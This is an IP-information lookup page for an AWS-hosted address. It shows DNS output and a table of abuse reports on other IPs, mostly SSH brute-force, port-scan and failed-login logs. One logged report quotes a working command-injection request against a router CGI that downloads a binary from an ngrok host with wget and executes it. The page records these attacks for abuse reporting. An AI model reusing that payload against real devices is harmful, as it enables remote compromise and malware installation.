100.21.163.81 - IPInfo

Basic Info

City: Boardman

Region: Oregon

Country: United States

Internet Service Provider: unknown

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:

Make a comment on this IP

No discussion about this IP yet. Click above link to make one.

Comments on same subnet:

No discussion about this subnet yet..

Whois info:

Dig info:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 100.21.163.81
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 34957
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;100.21.163.81.			IN	A

;; AUTHORITY SECTION:
.			201	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2020092502 1800 900 604800 86400

;; Query time: 39 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sat Sep 26 09:49:22 CST 2020
;; MSG SIZE  rcvd: 117

Host info

81.163.21.100.in-addr.arpa domain name pointer ec2-100-21-163-81.us-west-2.compute.amazonaws.com.

Nslookup info:

Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
81.163.21.100.in-addr.arpa	name = ec2-100-21-163-81.us-west-2.compute.amazonaws.com.

Authoritative answers can be found from:

Related IP info:

Related comments:

IP	Type	Details	Datetime
151.99.146.218	attack	[19/May/2020:02:20:21 +0200] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a HTTP/1.1"	2020-05-20 00:40:15
118.24.200.40	attackspambots	SSH authentication failure x 6 reported by Fail2Ban ...	2020-05-20 00:30:32
185.85.191.201	attackbots	WordPress login attack	2020-05-20 00:29:58
120.211.61.239	attack	$f2bV_matches	2020-05-20 01:23:07
167.99.48.123	attackbots	Automatic report BANNED IP	2020-05-20 01:04:17
148.70.246.130	attackbots	2020-05-19T11:44:58.647050scmdmz1 sshd[18511]: Invalid user eag from 148.70.246.130 port 41920 2020-05-19T11:45:00.885248scmdmz1 sshd[18511]: Failed password for invalid user eag from 148.70.246.130 port 41920 ssh2 2020-05-19T11:48:41.430748scmdmz1 sshd[19009]: Invalid user svf from 148.70.246.130 port 32831 ...	2020-05-20 01:24:21
106.12.119.218	attackspambots	Invalid user lkw from 106.12.119.218 port 48412	2020-05-20 01:02:17
106.12.114.35	attackspam	May 19 11:50:04 vps647732 sshd[8450]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.114.35 May 19 11:50:05 vps647732 sshd[8450]: Failed password for invalid user gnd from 106.12.114.35 port 41594 ssh2 ...	2020-05-20 01:09:34
192.135.251.70	attackspambots	400 BAD REQUEST	2020-05-20 01:08:44
66.70.130.149	attackspambots	May 19 11:49:21 mail sshd[30536]: Invalid user evs from 66.70.130.149 May 19 11:49:21 mail sshd[30536]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=66.70.130.149 May 19 11:49:21 mail sshd[30536]: Invalid user evs from 66.70.130.149 May 19 11:49:22 mail sshd[30536]: Failed password for invalid user evs from 66.70.130.149 port 36582 ssh2 ...	2020-05-20 01:15:46
178.62.252.146	attackspam	Blocked for port scanning (Port 23 / Telnet brute-force). Time: Sun May 17. 06:47:24 2020 +0200 IP: 178.62.252.146 (NL/Netherlands/-) Sample of block hits: May 17 06:46:47 vserv kernel: [4933629.880353] Firewall: TCP_IN Blocked IN=venet0 OUT= MAC= SRC=178.62.252.146 DST=[removed] LEN=40 TOS=0x00 PREC=0x00 TTL=51 ID=29868 PROTO=TCP SPT=47410 DPT=23 WINDOW=47045 RES=0x00 SYN URGP=0 May 17 06:46:50 vserv kernel: [4933632.893893] Firewall: TCP_IN Blocked IN=venet0 OUT= MAC= SRC=178.62.252.146 DST=[removed] LEN=40 TOS=0x00 PREC=0x00 TTL=51 ID=29868 PROTO=TCP SPT=47410 DPT=23 WINDOW=47045 RES=0x00 SYN URGP=0 May 17 06:46:55 vserv kernel: [4933637.601554] Firewall: TCP_IN Blocked IN=venet0 OUT= MAC= SRC=178.62.252.146 DST=[removed] LEN=40 TOS=0x00 PREC=0x00 TTL=51 ID=29868 PROTO=TCP SPT=47410 DPT=23 WINDOW=47045 RES=0x00 SYN URGP=0 May 17 06:46:56 vserv kernel: [4933638.657102] Firewall: TCP_IN Blocked IN=venet0 OUT= MAC= SRC=178.62.252.146 DST=[removed] LEN=40 TOS=0x00 PREC=0x00 TTL=51 ID=29868	2020-05-20 01:25:29
185.234.219.224	attackspambots	May 19 18:15:32 ns3042688 courier-pop3d: LOGIN FAILED, user=test@makita-dolmar.com, ip=\[::ffff:185.234.219.224\] ...	2020-05-20 00:34:21
183.62.138.52	attack	May 19 13:14:32 NPSTNNYC01T sshd[29498]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=183.62.138.52 May 19 13:14:35 NPSTNNYC01T sshd[29498]: Failed password for invalid user xrc from 183.62.138.52 port 51900 ssh2 May 19 13:17:07 NPSTNNYC01T sshd[29682]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=183.62.138.52 ...	2020-05-20 01:23:39
118.71.50.229	attackbots	1589881782 - 05/19/2020 11:49:42 Host: 118.71.50.229/118.71.50.229 Port: 445 TCP Blocked	2020-05-20 01:12:43
119.160.136.34	attackbotsspam	Dovecot Invalid User Login Attempt.	2020-05-20 01:14:05

Recently Reported IPs

106.255.52.48	102.89.7.29	216.240.124.230	89.24.130.210
62.182.161.246	51.132.224.163	1.53.36.176	1.53.210.72
165.232.47.213	1.53.158.198	1.53.129.193	198.12.254.72
213.197.234.225	89.39.107.209	43.226.148.212	1.52.30.219
1.52.161.204	1.46.128.131	1.36.219.169	1.4.176.80